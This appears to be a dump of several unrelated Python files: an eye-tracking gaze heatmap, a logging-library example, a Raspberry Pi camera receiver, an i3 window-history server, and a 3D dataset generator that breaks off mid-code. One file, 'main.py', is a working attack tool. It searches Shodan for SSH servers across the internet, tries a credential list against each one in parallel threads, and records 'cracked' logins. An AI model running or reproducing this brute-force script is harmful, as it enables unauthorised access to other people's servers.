[(0, 0, 0), (536.575, 0, 0), (536.575, -361.95, 0), (0, -361.95, 0)]
)
UNITS_E = 1 # mm per box
UNITS_W = 14 # mm per box
Hoff = np.eye(4)
Hoff[:3, 3] = np.array([-1.06, -1.28, 0.0])
HoffW = np.eye(4)
HoffW[:3, 3] = np.array([-168.0, -100.0, -235.0])
HEW = np.eye(4)
# R = np.array([78.69,90.0,180+39.67])
R = np.array([-14.0, 40.0, 143]) # ********** DONT DELETE
HEW[:3, :3] = cv2.Rodrigues(R)[0]
HEW[:3, 3] = np.array([-58.58, -18.19, 32.47])
# H90 = np.eye(4)
# H90[:3,:3] = cv2.Rodrigues(np.array([0.0,0.0,0.0]))[0]
# Z = 1000
markdict = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_6X6_250)
arucoParams = cv2.aruco.DetectorParameters_create()
# TODO edit default params
rvecM = [0.0, 0.0, 0.0]
tvecM = [0.0, 0.0, 0.0]
plane = None
# aruco
def getNewArucoImg():
markerSize = 93
outimg = cv2.aruco.drawMarker(markdict, 5, markerSize)
height = 1050
width = 1680
bigPic = np.ones((height, width))
# random offset
yo = np.random.randint(0, width - markerSize)
xo = np.random.randint(0, height - markerSize)
bigPic[xo:xo + markerSize, yo:yo + markerSize] = outimg
return bigPic, (xo + markerSize / 2, yo + markerSize / 2)
# aflag = True
# HEATMAP
def gkern(kernlen, sigma):
# First a 1-D Gaussian
lim = kernlen // 2 + (kernlen % 2) / 2
t = np.linspace(-lim, lim, kernlen)
bump = np.exp(-0.25 * (t / sigma)**2)
bump /= np.trapz(bump) # normalize the integral to 1
# make a 2-D kernel out of it
return bump[:, np.newaxis] * bump[np.newaxis, :]
img0 = np.zeros((1050, 1680, 3))
img1 = np.zeros((1050, 1680, 3))
radius = 200
sigma = 30
gain = 500
decay = 1.007
mask = gkern(2 * radius + 1, sigma) * gain
cv2.namedWindow('heatmap')
curpos = [int(img1.shape[0] / 2), int(img1.shape[1] / 2)]
# MAIN LOOP
while True:
image0 = vs0.read()
image1 = vs1.read()
if image0 is not None:
# image0 = cv2.rotate(image0, cv2.ROTATE_90_CLOCKWISE)
frame.gray = cv2.cvtColor(image0, cv2.COLOR_BGR2GRAY)
frame.img = image0.copy()
prevImage = image0.copy()
frame.timestamp = time.time()
else:
frame.img = prevImage.copy()
frame.gray = cv2.cvtColor(prevImage, cv2.COLOR_BGR2GRAY)
frame.timestamp = time.time()
if image1 is not None:
image1 = cv2.rotate(image1, cv2.ROTATE_180)
prevImage1 = image1.copy()
else:
image1 = prevImage1
corners, ids, rejected = cv2.aruco.detectMarkers(
image1, markdict, cameraMatrix=cameraMatrix1, distCoeff=distCoeffs1
)
# print(corners)
# print('ids:',ids)
image1 = cv2.aruco.drawDetectedMarkers(image1, corners, ids, (255, 0, 255))
rvecsC, tvecsC, _ = cv2.aruco.estimatePoseSingleMarkers(
corners, 50, cameraMatrix1, distCoeffs1
)
# print(rvecsC)
# print("individual t vecs: ",tvecsC)
if ids is not None and len(corners) == len(ids) == 4:
imgPoints = np.array([corners[x] for x in ids.T[0].argsort()])
plane = np.array([tvecsC[x][0][:] for x in ids.T[0].argsort()])
# gazepoint = plane[4]
# plane = plane[:4]
print("Monitor: ", plane)
# print("3d gaze point: ",gazepoint)
# retval, rvecM, tvecM = solveperp(objPoints, imgPoints, cameraMatrix1,
# distCoeffs1, 1)
result = pupil_detector.detect(frame, roi, True)
draw_ellipse(
frame.img, result['ellipse']['center'],
[x / 2 for x in result['ellipse']['axes']], result['ellipse']['angle'], 0, 360,
(255, 255, 0), 2
)
sphere = np.array(result['sphere']['center'])
pupil = np.array(result['circle_3d']['center'])
print("sphere: ", sphere)
print("pupil: ", pupil)
draw_gaze(frame.img, sphere, pupil, Hoff, cameraMatrix0, distCoeffs0)
HEW[:3, :3] = cv2.Rodrigues(R)[0]
H_all = Hoff @ HEW @ HoffW
# print(H_all)
sphere2 = H_all[:3, :3] @ sphere + H_all[:3, 3]
pupil2 = H_all[:3, :3] @ pupil + H_all[:3, 3]
pupil2[0] *= -1
sphere2[0] *= -1
# pupil2 *= UNITS_E/UNITS_W
# sphere2 *= UNITS_E/UNITS_W
# print("sphere2: ", sphere2)
# print("pupil2: ", pupil2)
gaze = pupil2 - sphere2
if plane is None:
plane = objPoints.copy()
plane[:, 0] -= 536.575 / 2
plane[:, 1] += 361.95 / 2
plane /= UNITS_W
plane[:, 2] = 10000
# print("Plane: ",plane)
draw_plane(image1, plane[0:4], np.eye(4), cameraMatrix1, distCoeffs1)
gazeEnd = lineIntersection(
plane[0], np.cross(plane[1] - plane[0], plane[2] - plane[1]), pupil2, gaze
)
gazepoint2d = np.abs(plane[1] - gazeEnd)[:2] * 2
print(gazepoint2d)
curpos = [int(gazepoint2d[1]),int(gazepoint2d[0])] # [int(x) for x in gazepoint2d]
xn = max(curpos[0] - radius, 0)
yn = max(curpos[1] - radius, 0)
xm = min(curpos[0] + radius + 1, img1.shape[0])
ym = min(curpos[1] + radius + 1, img1.shape[1])
kxn = radius - (curpos[0] - xn)
kyn = radius - (curpos[1] - yn)
kxm = radius + xm - curpos[0]
kym = radius + ym - curpos[1]
# print(curpos)
# print((xn, yn), ' ', (xm, ym))
# print((kxn, kyn), ' ', (kxm, kym))
try:
img1[xn:xm, yn:ym, 0] += mask[kxn:kxm, kyn:kym]
img1[xn:xm, yn:ym, 1] -= mask[kxn:kxm, kyn:kym] / 4
img1[xn:xm, yn:ym, 2] -= mask[kxn:kxm, kyn:kym] / 2
img1[:, :, :] /= decay
cv2.imshow('preview', img0 + img1)
except Exception as e:
print(e)
# gazeEnd2 = gazeEnd + 2*gaze
# print("Cross: ", np.cross(plane[1]-plane[0],plane[2]-plane[1]))
# print("GazeE: ", gazeEnd)
# print("GazeE2: ", gazeEnd2)
# print("R: ", R)
print("Hoff: ", Hoff)
print("HoffW: ", HoffW)
draw_gaze(image1, pupil, gazeEnd, np.eye(4), cameraMatrix1, distCoeffs1)
# draw_gaze(
# image1, gazeEnd, gazeEnd2, np.eye(4),
# cameraMatrix1, distCoeffs1
# )
image1 = cv2.aruco.drawAxis(
image1, cameraMatrix1, distCoeffs1,
cv2.Rodrigues(H_all[:3, :3])[0], plane[0], 100
)
if image0 is not None:
cv2.imshow('Video0', frame.img)
if vout0:
vout0.write(frame.img)
if image1 is not None:
cv2.imshow('Video1', image1)
if vout1:
vout1.write(image1)
# if aflag == True:
# aimg,(xxx,yyy)= getNewArucoImg()
# cv2.imshow("aruco", aimg)
# print('the x and y of the center aruco img',xxx ,' ',yyy)
# aflag = False
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
elif key & 0xFF == ord('h'):
Hoff[:3, 3][0] += 0.02
elif key & 0xFF == ord('j'):
Hoff[:3, 3][0] -= 0.02
elif key & 0xFF == ord('k'):
Hoff[:3, 3][1] += 0.02
elif key & 0xFF == ord('l'):
Hoff[:3, 3][1] -= 0.02
elif key & 0xFF == ord('t'):
R[0] += 1.0
elif key & 0xFF == ord('y'):
R[0] -= 1.0
elif key & 0xFF == ord('u'):
R[1] += 1.0
elif key & 0xFF == ord('i'):
R[1] -= 1.0
elif key & 0xFF == ord('o'):
R[2] += 1.0
elif key & 0xFF == ord('p'):
R[2] -= 1.0
elif key & 0xFF == ord('x'):
HoffW[:3, 3][0] += 1.02
elif key & 0xFF == ord('c'):
HoffW[:3, 3][0] -= 1.02
elif key & 0xFF == ord('v'):
HoffW[:3, 3][1] += 1.02
elif key & 0xFF == ord('b'):
HoffW[:3, 3][1] -= 1.02
elif key & 0xFF == ord('n'):
HoffW[:3, 3][2] += 1.02
elif key & 0xFF == ord('m'):
HoffW[:3, 3][2] -= 1.02
# elif key & 0xFF == ord('a'):
# aflag = True
# elif key & 0xFF == ord('z'):
# Z += 1
# elif key & 0xFF == ord('x'):
# Z -= 1
elif key == 32: # spacebar will save the following images
# cv2.imwrite('photos/0-'+str(time)+'.png', image0)
# cv2.imwrite('photos/1-'+str(time)+'.png', image1)
# time += 1
pass
if vout0:
vout0.release()
if vout1:
vout1.release()
cv2.destroyAllWindows()
time.sleep(0.5)
vs0.stop()
vs1.stop()
|
example.py
|
from lamp import MatplotScalarHandler
from lamp import MatplotImageHandler
from lamp import DataLogger
from lamp import VisdomScalarHandler
from lamp import VisdomImageHandler
from lamp import VisdomHistHandler
from lamp import VisdomParameterHandler
import logging
import numpy as np
import torch
def matplothandlers():
logging.setLoggerClass(DataLogger)
my_logger = logging.getLogger(__name__)
handlerscalar = MatplotScalarHandler()
handlerimage = MatplotImageHandler()
my_logger.addHandler(handlerscalar)
my_logger.addHandler(handlerimage)
my_logger.setLevel(logging.DEBUG)
my_logger.image(np.random.uniform(size=(32, 32)), cmap="gray")
for i in range(50):
my_logger.scalar(i**2)
def vizdomhandlers():
logging.setLoggerClass(DataLogger)
my_logger = logging.getLogger(__name__)
vizscalarhandler = VisdomScalarHandler(logging.DATA,
overwrite_window=True)
vizhisthandler = VisdomHistHandler(logging.DATA,
overwrite_window=True)
my_logger.addHandler(vizscalarhandler)
my_logger.addHandler(vizhisthandler)
my_logger.setLevel(logging.DATA)
for i in range(10):
my_logger.scalar(i**2, win="polynomial", trace="x^2")
my_logger.scalar(i**2-5*i + 2, win="polynomial", trace="x^2 - 5x + 2")
gauss_vector = torch.randn(500)
my_logger.histogram(gauss_vector, win="Normal distribution")
def multiprocessing_vizdom():
import time
import random
from math import log
import numpy as np
import scipy.stats as stats
from torch.multiprocessing import Manager
from torch.multiprocessing import Process
manager = Manager()
logging.setLoggerClass(DataLogger)
my_logger = logging.getLogger(__name__)
vizscalarhandler = VisdomScalarHandler(
logging.DATA, overwrite_window=True, manager=manager)
my_logger.addHandler(vizscalarhandler)
my_logger.setLevel(logging.DATA)
def func(logger, j):
for i in np.linspace(-5, 5, 200):
value = stats.norm(j/5-2.5, 1).pdf(i*(1+j/10))
logger.scalar(value, index=i, env="main",
win="normal-pdf", trace="trace-" + str(j))
p_list = []
for i in range(10):
p = Process(target=func, args=(my_logger, i))
p_list.append(p)
p.start()
for p in p_list:
p.join()
if __name__ == "__main__":
vizdomhandlers()
# matplothandlers()
# multiprocessing_vizdom()
|
camerareceiver.py
|
# Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import sys
sys.path.append('.')
import time
import socket
import struct
import numpy as np
import cv2
from threading import Thread
import multiprocessing
from multiprocessing import Process,Event
from src.utils.templates.workerprocess import WorkerProcess
class CameraReceiver(WorkerProcess):
# ===================================== INIT =========================================
def __init__(self, inPs, outPs):
"""Process used for debugging. It receives the images from the raspberry and
duplicates the perception pipline that is running on the raspberry.
Parameters
----------
inPs : list(Pipe)
List of input pipes
outPs : list(Pipe)
List of output pipes
"""
super(CameraReceiver,self).__init__(inPs, outPs)
self.port = 2244
self.serverIp = '0.0.0.0'
self.imgSize = (480,640,3)
#self.frame_counter = 0
self.out_video = cv2.VideoWriter('/home/keith/Desktop/rpi_video.mp4',cv2.VideoWriter_fourcc('a','v','c','1'),10,(self.imgSize[0],self.imgSize[1]))
#self.out_video = cv2.VideoWriter('/home/keith/Desktop/rpi_video.mp4',cv2.VideoWriter_fourcc('H','2','6','4'),10,(self.imgSize[1],self.imgSize[0]))
#self.out_video = cv2.VideoWriter('/home/keith/Desktop/rpi_video.mp4',cv2.VideoWriter_fourcc('M','P','4','V'),10,(self.imgSize[1],self.imgSize[0]))
#self.out_video = cv2.VideoWriter('/home/keith/Desktop/rpi_video.avi',cv2.VideoWriter_fourcc('M','J','P','G'),10,(self.imgSize[1],self.imgSize[0]))
# ===================================== RUN ==========================================
def run(self):
"""Apply the initializers and start the threads.
"""
self._init_socket()
super(CameraReceiver,self).run()
# ===================================== INIT SOCKET ==================================
def _init_socket(self):
"""Initialize the socket.
"""
self.server_socket = socket.socket()
self.server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.server_socket.bind((self.serverIp, self.port))
self.server_socket.listen(0)
self.connection = self.server_socket.accept()[0].makefile('rb')
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the read thread to receive the video.
"""
readTh = Thread(name = 'StreamReceiving',target = self._read_stream, args = (self.outPs, ))
self.threads.append(readTh)
# ===================================== READ STREAM ==================================
def _read_stream(self, outPs):
"""Read the image from input stream, decode it and show it.
Parameters
----------
outPs : list(Pipe)
output pipes (not used at the moment)
"""
try:
while True:
# decode image
image_len = struct.unpack('<L', self.connection.read(struct.calcsize('<L')))[0]
bts = self.connection.read(image_len)
# ----------------------- read image -----------------------
image = np.frombuffer(bts, np.uint8)
image = cv2.imdecode(image, cv2.IMREAD_COLOR)
image = np.reshape(image, self.imgSize)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
#self.out_video.write(image)
#grey = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# Make the grey scale image have three channels
#grey_3_channel = cv2.cvtColor(grey, cv2.COLOR_GRAY2BGR)
#processed=process_image(image)
hor_concat = np.hstack((image, image))
# ----------------------- show images -------------------
#cv2.imshow('Image', hor_concat)
#frame_filename="~/Desktop/frame%d.jpg"%self.frame_counter
#cv2.imwrite(frame_filename,image)
#print(self.frame_counter)
#np.save(frame_filename,image)
#cv2.imshow('Image',image)
#self.frame_counter+=1
self.out_video.write(image)
cv2.waitKey(1)
except:
pass
finally:
self.connection.close()
self.server_socket.close()
self.out_video.release()
|
history-server.py
|
#!/usr/bin/env python3
import os
import socket
import selectors
import threading
import json
from argparse import ArgumentParser
import i3ipc
MAX_WIN_HISTORY = 15
parser = ArgumentParser(prog='i3-app-focus.py', description='''''', epilog='''''')
parser.add_argument('--socket-file', default='/tmp/i3-app-focus.socket', help='Socket file path')
(args, other) = parser.parse_known_args()
class FocusWatcher:
def __init__(self):
self.i3 = i3ipc.Connection()
self.i3.on('window::focus', self._on_window_focus)
self.listening_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
if os.path.exists(args.socket_file):
os.remove(args.socket_file)
self.listening_socket.bind(args.socket_file)
self.listening_socket.listen(2)
self.window_list = []
self.window_list_lock = threading.RLock()
def run(self):
t_i3 = threading.Thread(target=self._launch_i3)
t_server = threading.Thread(target=self._launch_server)
for t in (t_i3, t_server):
t.start()
def _on_window_focus(self, i3conn, event):
window_id = event.container.id
con = self.i3.get_tree().find_by_id(window_id)
if not self._is_window(con):
return
with self.window_list_lock:
if window_id in self.window_list:
self.window_list.remove(window_id)
self.window_list.insert(0, window_id)
if len(self.window_list) > MAX_WIN_HISTORY:
del self.window_list[MAX_WIN_HISTORY:]
def _launch_i3(self):
self.i3.main()
def _launch_server(self):
selector = selectors.DefaultSelector()
def accept(sock):
conn, addr = sock.accept()
tree = self.i3.get_tree()
info = []
with self.window_list_lock:
for window_id in self.window_list:
con = tree.find_by_id(window_id)
if con:
info.append({
"id": con.id,
"window": con.window,
"window_title": con.window_title,
"window_class": con.window_class,
"window_role": con.window_role,
"focused": con.focused
})
conn.send(json.dumps(info).encode())
conn.close()
selector.register(self.listening_socket, selectors.EVENT_READ, accept)
while True:
for key, event in selector.select():
callback = key.data
callback(key.fileobj)
@staticmethod
def _is_window(con):
return not con.nodes and con.type == "con" and (con.parent and con.parent.type != "dockarea"
or True)
focus_watcher = FocusWatcher()
focus_watcher.run()
|
main.py
|
import json, threading, socket, time
import shodan, paramiko
config = json.loads(open('config.json', 'r').read())
api = shodan.Shodan(config['shodan'])
already_seen = []
servers = []
def loop():
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for server in servers:
host = server['ip_str']
if host not in already_seen:
for credential in config['credentials']:
username, password = credential['username'], credential['password']
try:
client.connect(hostname=host, username=credential['username'], password=credential['password'], timeout=config['timeout'], banner_timeout=200)
print(f'cracked login for {host}')
with open('hits.txt', 'a+') as f:
f.write(f'{username}:{password} @ {host}\n')
break
except paramiko.SSHException:
continue
except paramiko.AuthenticationException:
continue
except:
print('unhandled exception')
break
already_seen.append(host)
if __name__ == '__main__':
result = api.search("ssh")
total = '{0:,}'.format(result['total'])
print(f'found {total} servers running ssh')
servers = result['matches']
threads = []
for i in range(config['threads']):
thread = threading.Thread(target=loop, daemon=True)
threads.append(thread)
thread.start()
print(f'created thread #{i + 1}')
for thread in threads:
thread.join()
print('joined thread')
|
single_object.py
|
from tdw.controller import Controller
from tdw.tdw_utils import TDWUtils
from tdw.output_data import IdPassGrayscale, Images, ImageSensors, Environments, OutputData, Transforms
from tdw.librarian import ModelLibrarian, MaterialLibrarian, HDRISkyboxLibrarian, ModelRecord, HDRISkyboxRecord
import numpy as np
from tqdm import tqdm
import os
from subprocess import call
from secrets import token_urlsafe
from pathlib import Path
import json
from datetime import datetime
from threading import Thread
from time import time
from typing import List, Dict
RNG = np.random.RandomState(0)
class ImagePosition:
"""
Data to stage an image.
"""
def __init__(self, avatar_position: dict,
camera_rotation: dict,
object_position: dict,
object_rotation: dict):
"""
:param avatar_position: The position of the avatar as a Vector3.
:param camera_rotation: The rotation of the avatar as a Quaternion.
:param object_position: The position of the object as a Vector3.
:param object_rotation: The rotation of the object as a Quaternion.
"""
self.avatar_position = avatar_position
self.camera_rotation = camera_rotation
self.object_position = object_position
self.object_rotation = object_rotation
class Environment:
"""
Environment data for a single environment.
"""
def __init__(self, envs: Environments, e: int):
"""
:param envs: The environments data.
:param e: The index of this environment.
"""
self.x, y, self.z = envs.get_center(e)
self.w, self.h, self.l = envs.get_bounds(e)
class SingleObject(Controller):
def __init__(self,
port=1071,
launch_build=False,
visual_material_swapping=False,
new=False,
screen_size=256,
output_size=256,
hdri=False,
show_objects=True,
clamp_rotation=False,
max_height=1.0,
grayscale_threshold=0.5,
less_dark=False,
id_pass=False,
no_overwrite=False,
do_zip=False,
train=1300000,
val=50000,
library="models_full.json",
temp_urls: bool = False):
"""
:param port: The port used to connect to the build.
:param launch_build: If True, automatically launch the build. Always set this to False on a Linux server.
:param visual_material_swapping: If true, set random visual materials per frame.
:param new: If true, clear the list of models that have already been used.
:param screen_size: The screen size of the build.
:param output_size: The size of the output images.
:param hdri: If true, use a random HDRI skybox per frame.
:param show_objects: If true, show objects.
:param clamp_rotation: If true, clamp the rotation to +/- 30 degrees around each axis.
:param max_height: The percentage of the environment height that is the ceiling for the avatar and object. Must be between 0 and 1.
:param grayscale_threshold: The grayscale threshold. Higher value = slower FPS, better composition. Must be between 0 and 1.
:param less_dark: If true, there will be more daylight exterior skyboxes (requires hdri == True)
:param id_pass: If true, send the _id pass.
:param no_overwrite: If true, don't overwrite images.
:param do_zip: If true, zip the directory at the end.
:param train: Number of train images.
:param val: Number of val images.
:param library: The path to the library records file.
"""
self.screen_size = screen_size
self.output_size = output_size
self.show_objects = show_objects
self.clamp_rotation = clamp_rotation
self.max_height = max_height
self.grayscale_threshold = grayscale_threshold
self.id_pass = id_pass
self.no_overwrite = no_overwrite
self.do_zip = do_zip
self.train = train
self.val = val
assert 0 < max_height <= 1.0, f"Invalid max height: {max_height}"
assert 0 < grayscale_threshold <= 1.0, f"Invalid grayscale threshold: {grayscale_threshold}"
self.less_dark = less_dark
self.substructures: Dict[str, List[dict]] = {}
self.new = new
super().__init__(port=port, launch_build=launch_build)
self.model_librarian = ModelLibrarian(library=library)
self.material_librarian = MaterialLibrarian("materials_high.json")
self.hdri_skybox_librarian = HDRISkyboxLibrarian()
# Get material records.
if visual_material_swapping:
self.materials = self.material_librarian.records
else:
self.materials = None
# Get skybox records.
if hdri:
self.skyboxes = self.hdri_skybox_librarian.records
# Prefer exterior daytime skyboxes by adding them multiple times to the list.
if self.less_dark:
temp = self.skyboxes[:]
for skybox in temp:
if skybox.location != "interior" and skybox.sun_elevation >= 145:
self.skyboxes.append(skybox)
else:
self.skyboxes = None
# Download from pre-signed URLs.
if temp_urls:
self.communicate({"$type": "use_pre_signed_urls",
"value": True})
def initialize_scene(self, scene_command, a="a") -> list:
"""
Initialize the scene.
:param scene_command: The command to load the scene.
:param a: The avatar ID.
:return: The Environments data of the scene.
"""
# Initialize the scene.
# Add the avatar.
commands = [scene_command,
{"$type": "create_avatar",
"type": "A_Img_Caps_Kinematic",
"id": a,
"envs": [0]}]
# Disable physics.
# Enable jpgs.
# Set FOV.
# Set clipping planes.
# Set AA.
# Set aperture.
# Disable vignette.
commands.extend([{"$type": "simulate_physics",
"value": False},
{"$type": "set_img_pass_encoding",
"value": False},
{'$type': 'set_field_of_view',
'avatar_id': 'a',
'field_of_view': 60},
{'$type': 'set_camera_clipping_planes',
'avatar_id': 'a',
'far': 160,
'near': 0.01},
{"$type": "set_anti_aliasing",
"avatar_id": "a",
"mode": "subpixel"},
{"$type": "set_aperture",
"aperture": 70},
{'$type': 'set_vignette',
'enabled': False}])
# If we're using HDRI skyboxes, send additional favorable post-process commands.
if self.skyboxes is not None:
commands.extend([{"$type": "set_post_exposure",
"post_exposure": 0.6},
{"$type": "set_contrast",
"contrast": -20},
{"$type": "set_saturation",
"saturation": 10},
{"$type": "set_screen_space_reflections",
"enabled": False},
{"$type": "set_shadow_strength",
"strength": 1.0}])
# Send the commands.
self.communicate(commands)
# Get the environments data.
env_data = Environments(self.communicate({"$type": "send_environments",
"frequency": "once"})[0])
envs = []
for i in range(env_data.get_num()):
envs.append(Environment(env_data, i))
return envs
def generate_metadata(self, dataset_dir: str, scene_name: str) -> None:
"""
Generate a metadata file for this dataset.
:param dataset_dir: The dataset directory for images.
:param scene_name: The scene name.
"""
root_dir = f"{dataset_dir}/images/"
if not os.path.exists(root_dir):
os.makedirs(root_dir)
data = {"dataset": dataset_dir,
"scene": scene_name,
"train": self.train,
"val": self.val,
"visual_material_swapping": self.materials is not None,
"hdri": self.skyboxes is not None,
"screen_size": self.screen_size,
"output_size": self.output_size,
"clamp_rotation": self.clamp_rotation,
"show_objects": self.show_objects,
"max_height": self.max_height,
"grayscale_threshold": self.grayscale_threshold,
"less_dark": self.less_dark,
"multi_scene": self.no_overwrite,
"start": datetime.now().strftime("%H:%M %d.%m.%y")
}
with open(os.path.join(root_dir, "metadata.txt"), "wt") as f:
json.dump(data, f, sort_keys=True, indent=4)
def run(self, dataset_dir: str, scene_name: str) -> None:
"""
Generate the dataset.
:param dataset_dir: The dataset directory for images.
:param scene_name: The scene name.
"""
# Create the metadata file.
self.generate_metadata(dataset_dir,
scene_name=scene_name)
# The root directory of the output.
root_dir = f"{dataset_dir}/images/"
# The avatar ID.
a = "a"
# Initialize the scene.
envs = self.initialize_scene(self.get_add_scene(scene_name))
# Fetch the WordNet IDs.
wnids = self.model_librarian.get_model_wnids()
# Remove any wnids that don't have valid models.
wnids = [w for w in wnids if len(
[r for r in self.model_librarian.get_all_models_in_wnid(w) if not r.do_not_use]) > 0]
# Set the number of train and val images per wnid.
num_train = self.train / len(wnids)
num_val = self.val / len(wnids)
# Create the progress bar.
pbar = tqdm(total=len(wnids))
# If this is a new dataset, remove the previous list of completed models.
done_models_filename = "processed_records.txt"
if self.new and os.path.exists(done_models_filename):
os.remove(done_models_filename)
# Get a list of models that have already been processed.
processed_model_names = []
if os.path.exists(done_models_filename):
with open(done_models_filename, "rt") as f:
txt = f.read()
processed_model_names = txt.split("\n")
# Iterate through each wnid.
for w, q in zip(wnids, range(len(wnids))):
# Update the progress bar.
pbar.set_description(w)
# Get all valid models in the wnid.
records = self.model_librarian.get_all_models_in_wnid(w)
records = [r for r in records if not r.do_not_use]
# Get the train and val counts.
train_count = [len(a) for a in np.array_split(
np.arange(num_train), len(records))][0]
val_count = [len(a) for a in np.array_split(
np.arange(num_val), len(records))][0]
# Process each record.
fps = "nan"
for record, i in zip(records, range(len(records))):
# Set the progress bar description to the wnid and FPS.
pbar.set_description(f"record {i + 1}/{len(records)}, FPS {fps}")
# Skip models that have already been processed.
if record.name in processed_model_names:
continue
# Create all of the images for this model.
dt = self.process_model(record, a, envs, train_count, val_count, root_dir, w)
fps = round((train_count + val_count) / dt)
# Mark this record as processed.
with open(done_models_filename, "at") as f:
f.write(f"\n{record.name}")
pbar.update(1)
pbar.close()
# Add the end time to the metadata file.
with open(os.path.join(root_dir, "metadata.txt"), "rt") as f:
data = json.load(f)
end_time = datetime.now().strftime("%H:%M %d.%m.%y")
if "end" in data:
data["end"] = end_time
else:
data.update({"end": end_time})
with open(os.path.join(root_dir, "metadata.txt"), "wt") as f:
json.dump(data, f, sort_keys=True, indent=4)
# Terminate the build.
if not self.no_overwrite:
self.communicate({"$type": "terminate"})
# Zip up the images.
if self.do_zip:
zip_dir = Path(dataset_dir)
SingleObject.zip_images(zip_dir)
def set_skybox(self, records: List[HDRISkyboxRecord], its_per_skybox: int, hdri_index: int, skybox_count: int) -> (int, int, dict):
"""
If it's time, set a new skybox.
:param records: All HDRI records.
:param its_per_skybox: Iterations per skybox.
:param hdri_index: The index in the records list.
:param skybox_count: The number of images of this model with this skybox.
:return: (hdri_index, skybox_count, command used to set the skybox)
"""
# Set a new skybox.
if skybox_count == 0:
command = self.get_add_hdri_skybox(records[hdri_index].name)
# It's not time yet to set a new skybox. Don't send a command.
else:
command = None
skybox_count += 1
if skybox_count >= its_per_skybox:
hdri_index += 1
if hdri_index >= len(records):
hdri_index = 0
skybox_count = 0
return hdri_index, skybox_count, command
def process_model(self, record: ModelRecord, a: str, envs: list, train_count: int, val_count: int,
root_dir: str, wnid: str) -> float:
"""
Capture images of a model.
:param record: The model record.
:param a: The ID of the avatar.
:param envs: All environment data.
:param train_count: Number of train images.
:param val_count: Number of val images.
:param root_dir: The root directory for saving images.
:param wnid: The wnid of the record.
:return The time elapsed.
"""
image_count = 0
# Get the filename index. If we shouldn't overwrite any images, start after the last image.
if self.no_overwrite:
# Check if any images exist.
wnid_dir = Path(root_dir).joinpath(f"train/{wnid}")
if wnid_dir.exists():
max_file_index = -1
for image in wnid_dir.iterdir():
if not image.is_file() or image.suffix != ".jpg" \
or not image.stem.startswith("img_") or image.stem[4:-5] != record.name:
continue
image_index = int(image.stem[-4:])
if image_index > max_file_index:
max_file_index = image_index
file_index = max_file_index + 1
else:
file_index = 0
else:
file_index = 0
image_positions = []
o_id = self.get_unique_id()
s = TDWUtils.get_unit_scale(record)
# Add the object.
# Set the screen size to 32x32 (to make the build run faster; we only need the average grayscale values).
# Toggle off pass masks.
# Set render quality to minimal.
# Scale the object to "unit size".
self.communicate([{"$type": "add_object",
"name": record.name,
"url": record.get_url(),
"scale_factor": record.scale_factor,
"category": record.wcategory,
"id": o_id},
{"$type": "set_screen_size",
"height": 32,
"width": 32},
{"$type": "set_pass_masks",
"avatar_id": a,
"pass_masks": []},
{"$type": "set_render_quality",
"render_quality": 0},
{"$type": "scale_object",
"id": o_id,
"scale_factor": {"x": s, "y": s, "z": s}}])
# The index in the HDRI records array.
hdri_index = 0
# The number of iterations on this skybox so far.
skybox_count = 0
if self.skyboxes:
# The number of iterations per skybox for this model.
its_per_skybox = round((train_count + val_count) / len(self.skyboxes))
# Set the first skybox.
hdri_index, skybox_count, command = self.set_skybox(self.skyboxes, its_per_skybox, hdri_index, skybox_count)
self.communicate(command)
else:
its_per_skybox = 0
while len(image_positions) < train_count + val_count:
e = RNG.choice(envs)
# Get the real grayscale.
g_r, d, a_p, o_p, o_rot, cam_rot = self.get_real_grayscale(o_id, a, e)
if g_r > 0:
# Get the optimal grayscale.
g_o = self.get_optimal_grayscale(o_id, a, o_p, a_p)
if g_o > 0 and g_r / g_o > self.grayscale_threshold:
# Cache the position.
image_positions.append(ImagePosition(a_p, cam_rot, o_p, o_rot))
# Send images.
# Set the screen size.
# Set render quality to maximum.
commands = [{"$type": "send_images",
"frequency": "always"},
{"$type": "set_pass_masks",
"avatar_id": a,
"pass_masks": ["_img", "_id"] if self.id_pass else ["_img"]},
{"$type": "set_screen_size",
"height": self.screen_size,
"width": self.screen_size},
{"$type": "set_render_quality",
"render_quality": 5}]
# Hide the object maybe.
if not self.show_objects:
commands.append({"$type": "hide_object",
"id": o_id})
self.communicate(commands)
t0 = time()
# Generate images from the cached spatial data.
train = 0
for p in image_positions:
# Teleport the avatar.
# Rotate the avatar's camera.
# Teleport the object.
# Rotate the object.
# Get the response.
commands = [{"$type": "teleport_avatar_to",
"avatar_id": a,
"position": p.avatar_position},
{"$type": "rotate_sensor_container_to",
"avatar_id": a,
"rotation": p.camera_rotation},
